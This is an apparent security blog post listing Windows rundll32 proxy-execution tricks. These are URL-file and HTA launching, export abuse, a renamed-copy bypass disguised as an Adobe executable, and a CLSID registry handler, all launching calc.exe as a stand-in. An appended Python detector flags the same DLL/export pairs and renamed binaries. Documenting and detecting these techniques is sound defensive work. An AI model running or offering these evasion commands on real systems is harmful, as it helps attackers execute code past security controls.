rundll32 execution - r34l!ty - 不负勇往

rundll32 execution

August 3, 2018 • Security

calc.url

[InternetShortcut]
URL=file:///c:\windows\system32\calc.exe

Command

rundll32.exe ieframe.dll, OpenURL <path to local URL file>
rundll32.exe url.dll, OpenURL <path to local URL file>
rundll32.exe shdocvw.dll, OpenURL <path to local URL file>

HTA

rundll32.exe url.dll,OpenURL "local\path\to\harmless.hta"
rundll32.exe url.dll,OpenURLA "local\path\to\harmless.hta"

rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exe
rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe
rundll32 url.dll, FileProtocolHandler calc.exe
rundll32 zipfldr.dll, RouteTheCall calc.exe

Bypass

copy c:\windows\system32\rundll32.exe %appdata%\Adobe\adobe.exe

%appdata%\adobe\adobe.exe url.dll, OpenURL file://c:\windows\system32\calc.exe
%appdata%\adobe\adobe.exe url.dll, OpenURLA file://c:\windows\system32\calc.exe
%appdata%\adobe\adobe.exe url.dll, FileProtocolHandler calc.exe
%appdata%\adobe\adobe.exe zipfldr.dll, RouteTheCall calc.exe

CLSID

VBS

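' Generate a new GUID in registry format, e.g. {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
Set TypeLib = CreateObject("Scriptlet.TypeLib")
' TypeLib.Guid carries trailing characters; keep only the 38-character GUID
strGUID = Left(TypeLib.Guid, 38)
WScript.Echo strGUID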

PowerShell

powershell -C "[guid]::NewGuid().Guid"

Registry

reg add HKCU\Software\Classes\CLSID\{your clsid}\Shell\Manage\command /ve /t REG_SZ /d "cmd /c calc.exe"

Command

rundll32 url.dll, OpenURL shell::::{your clsid}
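
A defender's view of the commands above, as an added example that is not part of the original post: it classifies process-creation events by the DLL/export pairs listed on this page and by the PE OriginalFileName, so the renamed copy from the Bypass section is still caught. The event dicts use Sysmon Event ID 1 field names; the `classify` function, the finding labels and the sample events are constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# DLL -> exports used as launch proxies by the commands on this page.
PROXY_EXPORTS = {
    "ieframe.dll": {"openurl"},
    "url.dll": {"openurl", "openurla", "fileprotocolhandler"},
    "shdocvw.dll": {"openurl"},
    "zipfldr.dll": {"routethecall"},
}
# "<dll>,<export>" with optional whitespace around the comma.
DLL_EXPORT = re.compile(r'([\w.-]+\.dll)"?\s*,\s*(\w+)', re.IGNORECASE)

def classify(event):
    """Return findings for one process-creation event (Sysmon Event ID 1 fields)."""
    findings = []
    image = basename(event["Image"]).lower()
    original = event.get("OriginalFileName", "").lower()
    # PE version info survives a file copy, so it exposes the renamed binary.
    if original == "rundll32.exe" and image != "rundll32.exe":
        findings.append("renamed-rundll32")
    # The DLL/export pair is matched without looking at the image name at all.
    for dll, export in DLL_EXPORT.findall(event["CommandLine"]):
        if export.lower() in PROXY_EXPORTS.get(dll.lower(), ()):
            findings.append(f"proxy-export:{dll.lower()},{export.lower()}")
    return findings

# Constructed sample events (not taken from the page or from real logs).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exe"},
    {"Image": r"C:\Users\alice\AppData\Roaming\Adobe\adobe.exe",
     "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"C:\Users\alice\AppData\Roaming\Adobe\adobe.exe zipfldr.dll, RouteTheCall calc.exe"},
    {"Image": r"C:\Users\alice\AppData\Roaming\Adobe\adobe.exe",  # no version info logged
     "CommandLine": r"adobe.exe url.dll, FileProtocolHandler calc.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["Image"]), "->", classify(ev) or "no finding")
```

A rule keyed only on the image name `rundll32.exe` misses the second and third sample events; the command-line match and the OriginalFileName check are what catch them.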
